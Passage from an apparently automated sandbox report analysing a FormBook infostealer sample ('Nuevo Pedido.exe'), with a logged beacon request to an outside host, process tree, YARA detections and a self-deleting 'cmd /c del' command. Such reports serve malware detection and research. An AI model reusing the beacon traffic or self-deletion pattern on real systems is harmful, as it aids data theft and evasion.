                                X-Server-Cache: true
                                X-Proxy-Cache: MISS


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                4 | 192.168.2.5 | 49839 | 185.53.179.91 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 25, 2021 15:11:10.615487099 CET | 16021 | OUT | GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1
                                Host: www.onlinedatingthaiweb.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 25, 2021 15:11:10.632399082 CET | 16021 | IN | HTTP/1.1 403 Forbidden
                                Server: nginx
                                Date: Thu, 25 Nov 2021 14:11:10 GMT
                                Content-Type: text/html
                                Content-Length: 146
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                Code Manipulations

                                Statistics

                                Behavior

                                System Behavior

                                General

                                Start time:15:09:07
                                Start date:25/11/2021
                                Path:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Nuevo Pedido.exe"
                                Imagebase:0xa80000
                                File size:444928 bytes
                                MD5 hash:159C46C59CD8ECB7A2BCE707DE1BC370
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:15:09:10
                                Start date:25/11/2021
                                Path:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\Nuevo Pedido.exe
                                Imagebase:0xde0000
                                File size:444928 bytes
                                MD5 hash:159C46C59CD8ECB7A2BCE707DE1BC370
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                General

                                Start time:15:09:12
                                Start date:25/11/2021
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff693d90000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                General

                                Start time:15:09:37
                                Start date:25/11/2021
                                Path:C:\Windows\SysWOW64\cscript.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\cscript.exe
                                Imagebase:0xa50000
                                File size:143360 bytes
                                MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                General

                                Start time:15:09:44
                                Start date:25/11/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:15:09:45
                                Start date:25/11/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                Code Analysis
